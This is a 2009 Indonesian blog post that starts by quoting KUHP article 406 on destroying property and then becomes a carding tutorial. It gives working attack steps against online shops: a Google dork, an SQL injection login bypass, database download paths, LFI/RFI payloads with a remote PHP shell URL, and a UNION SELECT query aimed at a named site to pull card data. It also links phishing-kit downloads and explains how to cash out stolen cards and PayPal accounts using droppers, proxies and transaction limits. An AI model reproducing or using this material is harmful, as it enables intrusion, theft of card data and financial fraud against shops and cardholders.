Ketentuan mengenai perbuatan perusakan, penghancuran barang diatur dalam pasal 406-412 KUHP. Apabila kejahatan tersebut ditujukan pda sarana dan prasarana penerbangan diatur dalam pasal 479a-479h, 479m, dan 479p KUHP.

Pasal 406 KUHP berbunyi :

(1) Barangsiapa dengan sengaja melawan hukum menghancurkan, merusakkan, membikin tidak dapat dipakai lagi atau menghilangkan barang sesuatu yang seluruhnya atau sebagian adalah kepunyaan orang lain, diancam dengan pidana dipenjara paling lama dua tahun delapan bulan atau denda paling banyak empat ribu lima ratus rupiah

(2) Dijatuhkan pidana yang sama terhadap orang, yang dengan sengaja dan melawan hukum membunuh, merusakan, membikin tidak dapat digunakan atau menghilangkan hewan yang seluruhnya atau sebagian adalah kepunyaan orang lain

Pengertian-pengertian dalam pasal 406 KUHP dapat dijelaskan sebagai berikut :

1. Pengertian “menghancurkan” (vermielen)

Menghancurkan atau membinasakan dimaksudkan sebagai merusak sama sekali sehingga suatu barang tidak dapat berfungsi sebagaimana mestinya.

2. Pengertian “merusakkan”

Merusakkan dimaksudkan sebagai memperlakukan suatu barang sedemikian rupa namun kurang dan membinasakan (beschacdingen). Contoh perbuatan merusak data atau program komputer yang terdapat di internet dengan cara menghapus data atau program, membuat cacat data atau program, menambahkan data baru ke dalam suatu situs (web) atau sejenisnya secara acak. Dengan kata lain, perbuatan tersebut mengacaukan isi media penyimpanannya.

3. Pengertian “membikin / membuat tidak dapat dipakai lagi”

Tindakan itu harus sedemikian rupa, sehingga barang itu tidak dapat diperbaiki lagi. Kaitannya dengan kejahatan maya (cyber crime) adalah perbuatan yang dilakukan tersebut menyebebkan data atau program yang tersimpan dalam media penyimpan (data base) atau sejenisnya menjadi tidak dapat dimanfaatkan (tidak berguna lagi). Hal ini disebabkan oleh data atau program telah dirubah sebagian atau seluruhnya, atau dirusak pada suatu bagian atau seluruhnya, atau dihapus pada sebagian atau pada keseluruhannva.

4. Pengertian menghilangkan

Pengertian menghilangkan adalah membuat sehingga barang itu tidak ada lagi. Kaitannya dengan cyber crime ialah perbuatan menghilangkan atau menghapus data yang tersimpan pada data base (bisa juga tersimpan dalam suatu web) atau sejenisnya sehingga mengakibatkan semua atau sebagian dari data atau program menjadi hapus sama sekali.

Berdasarkan pengertian-pengertian mengenai perbuatan “menghancurkan”, merusak, “membuat tidak dapat dipakai lagi” dan “menghilangkan” dapatlah disimpulkan bahwa makna dan perbuatan-perbuatan tersebut terdapat kesesuaian yang pada intinya perbuatan tersebut menyebabkan fungsi dari data atau program dalam suatu jaringan menjadi berubah / berkurang

============================================================

contoh teknik yang di pakai carder

============================================================

1) cara pertama

melakukan attack pada vuln cart

teknik ini relavan sudah di kuasai oleh carder, ya seperti memanfaatkan bugs pada

cart yang vuln 1

contoh : vp-asp

masuk ke search engine km 1, mau google,altavista,yahoosearch,blackle,atau apalah

ketikin 



allinurl:shopadmin.asp 



jika dapat misalkan : www.elvinashop.com/vp-asp dir/shopadmin.asp

lalu masukan sql injektion ver1  'or''='  di user dan password 1 secara sama

2) downloading mdb (master database) asp 1

cari target yang sama seperti langkah ke 1

lalu ganti url menjadi 





www.elvinashop.com/vp-asp dir/shopdbtest.asp  atau

www.elvinashop.com/shopdbtest.asp



jika masuk lalu akan muncul informasi seperti :  Database,Dblocation,databasetype,dsb

biasanya di Database,Dblocation

contoh:



Database=cantik

Dblocation=elvina



maka logikanya adalah



www.elvinashop.com/elvina/cantik.mdb





3)  teknik seperti sql injecktion juga bisa di gunakan dalam carding

catatan : usahakan target adalah situs toko online yang memiliki shopadmin 10

untuk tekniknya sama seperti teknik sql injecktion biasa. untuk contohnya liat aja

di forum".



4)   lfi carding adalah teknik yang menggunakan injeksi file dalam site 1

menurut artiannya juga local file inclusion 10 . menyerang Cart untuk mendapatkan

informasi creditcard

vulner (cacatnya)adalah



allow_url_include = on; allow_url_fopen = on

yess.php

$page = $_GET[page];

include($page);

?>





dan



allow_url_include = on; allow_url_fopen = on; magic_quotes_gpc = off

$page = $_GET[page];

include($page.”.php”);

?>





exploitasi







http://elvinashop.com/yess.php?page=../../../../../../../../etc/passwd





or



http://elvinashop.com/yess.php?page=c:/boot.ini

jadi $page = $_GET[page] = ../../../../../../../../etc/passwd





keterangan : jika kita melakukan proses exploitasi seperti itu maka dengan demikian etc/passwd akan muncul di browser km, bukan isi php nya loh , tapi isi etc/passwd dalam situs target itu.



keterangan : untuk melakukan teknik ini, maka settingan magic_quotes_gpc harus off, jika magic_quotesnya on maka akan diganti oleh server menjadi \0 sehingga teknik null injection menjadi gagal total.



contoh : $page = $_GET[page] = ../../../../../../../../etc/passwd





5) teknik scaming atau teknik traping 10

hati" banyak webtrap yang sedang mengincar account anda 10

heuheuheu. ya klo misalkan bahasa sekarangnya adalah fakelogin 1

klo minat bisa di download di http://www.s2nmediagroup.com/album/bluestarjets/content/wow.rar

nah banyak macam" scampage disana 1



6)   teknik rfi carding 1

remote file inclusion 10

waw apaan tuh. contoh nya sama seperti lfi 1 vulnernya juga sama, ya karena sama" inclusion

mau teknik lfi,rce,rfi . semua sama kok

perbedaan nya hanya di butuhkan allow_url_include = on dan allow_url_fopen = on

nih contohnya

http://elvinashop.com/yess.php?page=http://www.carder.com/dor.txt

nah dengan demikian server akan mengeksekusi isi dari dor.txt

atau kita bisa saja memasukan evilscript seperti shell php 4 untuk upload file bisa gunakan shell ini

http://click-mexico.com/system/cache/pictures/vina.txt



7)  ------------------------------

SOCIAL ENGINERING ITU PERLU

------------------------------

dalam kiprahnya, si carder harus mampu mempunyai ilmu social enginering ,

karena sebelum melancarkan aksi"nya , pastilah di haruskan untuk melakukan sosialisasi ke target.

penting :: jika anda ingin membeli barang di onlineshop di haruskan untuk melakukan negosiasi dan sosialisasi pada sellernya

hal tersebut sangat berpengaruh pada kebenaran si customers ^_^.

ya kita bisa melakukan contact mail kepada target via yahoo,gmail,msn,dll.

untuk menjadi seorang tukang kartu harus mempunyai logika yang panjang ^_^

dalam teknik social enginering juga bisa berguna untuk pemanfaatan droper (alias tukang drop barang) wadoww..

kenapa harus menggunakan droper, ya karena indonesia sudah 3 tahun ini termasuk negara paling fraud di dunia,

jadi kebanyakan toko online tidak mau memberikan shippingan ke indonesia ^_^.

nah jika dapet toko yang kaya gitu ,

masih banyak jalan menuju roma ,

kita bisa menggunakan teknik social enginering pada orang" luar negri ,

ya kita bisa memanfaatkan teman,saudara,ataupun rekan bisnis .

atau kita bisa mencari droper sendiri dalam webchat , seperti situs myspace,facebook,fs,tagged,dll

gunakan teknik social enginering untuk mendapatkan hati si droper ^_^

ya vina doakan kalian bisa dapet droper orang australia ^_^ .



-------------------

pemanfaatan kartu

-------------------

pemanfaatan amunisi harus juga dimiliki seorang tukang main kartu .

heuheuheu 10 , amex,discover,visa,mastercard bisa didapatkan dari teknik" serangan rendah ataupun tinggi 1

seperti LFI,RFI,RCE,AFD,BOF,SQLi,XSS,SCAMPAGE,dll.

biasakan kita mencari target situs toko online juga untuk mendapatkan kartu" tersebut ^_^



contoh simpel kartu





Code:


Full Name : elvina yang cantik
Address : di jalan google
City,State,Zip : Austin,TX,78739
Country : United States
Phone Number : no esia yah ^_^
Email : elvina [at] doyan [dot] cc
CardType: MasterCard
Name on the Card: elvina yang cantik
Card Number: 545884********
Card Expiration Date: 1014
Cvv Number: 124



contoh simpel target







Code:


https://www.directorypub.com/SRCH/proddetail.php?aid=00590&&pub_id=-1 union (select 1,null,null,concat_ws(0x3a3a,alpha,approve,acct_no,addr1,addr2,alias,city,country,email,fax,ID,name,name2,phone,postalcode,state,tollfree,cc_type,card_name,cc_num,exp_date,check_no),5,6,7,8,9,10 from ml30nard_DPS.company where length(cc_num)>5+and+length(check_no)>0  and+cast(right(exp_date,2)+as+signed)>9 )--



untuk pemanfaatan kartu yang fresh bisa juga kita gunakan sebagai alat transaksi chip poker,online shopping,dan verified paypal.





[penting] gunakan proxy sesuai dengan kota pemilik kartu sebelum melakukan aksi ^_^ .

dan jika anda ingin hajar situs shoponline shipping indo , ya itu usahakan kita dapat toko online dari german

heuheuheu  , banyak yang recomended tuh di negara sana ^_^

bila seller udah percaya penuh pada kalian ( jangan takut" untuk hajar semua barangnya sampai bangkrut ) ^_^



cek limitasi kartu di avs yang anda percaya .

-> jangan cek validasi cc lewat irc ( karena cc ntar jadi mati )

-> lebih baik jika cc di dapatkan lewat spam ( biasanya masih fresh )

-> usahakan anda memiliki droper / virtual address seperti myus.com dll

---------------------

pemanfaatan paypal

----------------------



pasti udah taukan namanya paypal, dulu sih namanya payflow . tapi sekarang jadi paypal.

heuheuheu 



tekniknya harus rajin" trace email, klo dapet target trus ada log email sama passwordnya ,

ya harus sering cek kesamaan password sama emailnya ^_^

biasanya bule sih suka pake 1 password dalam beberapa account ^_^

atau kita lakukan attack pada toko yang memfasilitasi pembayaran melalui paypal ^_^

mungkin pembayarannya tar di redirect ke situs paypal, tapi kan waktu registrasi account baru di situs toko itu , 50:50 password sama ^_^

untuk melakukan teknik ini di haruskan mendapatkan :

=> email dan password accounnt email korban

=> email dan password account paypal korban

=> no kartu paypal korban



==================================================  ======



hal yang bisa kita lakukan dari paypal



1) transfer uang ( sendmoney ) via paypal

2) membeli barang di toko online ^_^

3) membeli rapidshare premium / account ^_^

4) penarikan uang ( withdraw )

5) pembelanjaan ebay





==================================================  ========



1) untuk melakukan sendmoney dari paypal korban ke paypal kita di harapkan kita juga harus memiliki account paypal terlebih dahulu.

catatan penting :: untuk melakukan transaksi tersebut di harapkan untuk melakukan transaksi max $200.00 ke paypal kita ^_^

paypal korban juga harus termasuk dalam tipe paypal bussines agar terhindari dari akses limited ^_^

atau kita bisa gunakan metode mass pay , agar pajak yang kita tanggung nanti sangat minim ^_^

usahakan kita melakukan sendmoney pada target yang email accountnya dan nomor cc nya kita pegang, ( hanya untuk melakukan resolve problem yang akan datang nanti ) atau untuk menghindari security messure 1

usahakan juga kita menggunakan proxy us / uk ketika membuka paypal account target ,karena jika kita melakukan logging dengan berbeda ip , account target akan terkena security messure ^_^, dan penggunaan proxy juga dapat mengurangi kecurigaan si trishna



2) membeli barang di toko online biasanya shippingannya pada alamat paypal tersebut, teknik ini sangat percuma, tapi masaih banyak jalan menuju sukses, klo mau jadi carder harus banyak akal loh , gunakan teknik social enginering kembali untuk melakukan negosiasi pada seller,sehingga shippingan berbuah tempat ^_^

3) membeli rapidshare premium / account biasanya berjalan lancar karena cart biasanya meminta comfrim payment doang ^_^ , jadi tinggal klik terus buka email deh ^_^

4) penarikan uang ( withdraw ) , nonsen kita narik paypal orang bule langsung kirim ke banking kita ^_^ cape deh , kita harus didik untuk memiliki account paypal yang sudah verified, ya itu tekniknya seperti dalam no ( 1 ) ,

catatan penting :: dalam menarik uang , jika kita ingin berjalan lancar , usahakan untuk mempunyai banking luarnegri , ya seperti virtual bank ,atau bank indonesia ^_^ , untuk metodenya gunakan cara social enginering ^_^ .

atau kita juga bisa menarik uang paypal korban dengan cara mengirimkan pada paypal teman kita yang mempunyai paypal luar negri ^_^, klo hasilnya sih 50:50 pasti adil ^_^





------------------

pemanfaatan scam

------------------

scam sangat berlekatan dalam dunia tukang maen kartu ,

pembuatan scam page ,scam mail , dll 

nah cara pemanfaatan scam sih cuma untuk mendapatkan amunisi aja sih ,tapi jangan lupa juga mailer nya mesti FUD ( fully undetected ) alias ga kedetek sama antivirus . jadi mesti di crypter sampai ga kedetek , ya selain gunain mailer , bisa juga gunain smtp , kalau mau terus inbox cari server infong ya.  



ya kita bisa mendapatkan amunisi kartu , atau account banking ^_^

nih klo mau download disini aja :



http://www.a1e.es/templates/beez/wow.rar





melawan hukum dikarenakan faktor krisis ekonomi di negara kita sendiri

sempitnya lahan usaha,susahnya mencari kerja,dsb

faktor tersebut mempengaruhi orang" seperti mereka melakukan hal itu,

bagiamana menurut pendapat kalian ?



./me berharap untuk president yang akan datang mampu mengerti suara kami 1

./kami bukan penjahat.

./kami hanya ingin sesuap nasi untuk menyambung nyawa dan bukan hanya sekedar foya"



semoga membantu



.tHX



ELV1N4


Labels: 



On 5/2/09 at 

9:57 AM






      




My Profile:

      
      


        


Biography:




short story:


      




      

      

      
      
[ Friends Link ]

      
      
[ chat with me ]


      

      

      

      

      




      












            		
      

    

      
      
[ archives ]

      

      
[ Notices ]


    

    

      

      


By title


K.O WITH DDOS ATTACK




Introduction to Load Balancing with HAPROXY




Apa sih ?




Thnx Mr.x




Hacker Malaysia Berunding Untuk Damai Dengan Hacker Indonesia




BACKTRACK 4 BETA SUDAH DI RILIS




apa itu CARDING ?



By month

2002.03

2002.12

2005.12

2008.11

2009.02

2009.03

2009.04

2009.05

2009.06

2009.07

2009.08

2009.09

2009.10

2009.11

2009.12

2010.01

2010.03


		
	





			
		
		
				

      
      





       

    


  

  





  

  

    


      
      
elv1n4 Themes  v2.0.0  © 2009 by elv1n4 


    

  

www[dot]elv1n4.anti-sec[dot]org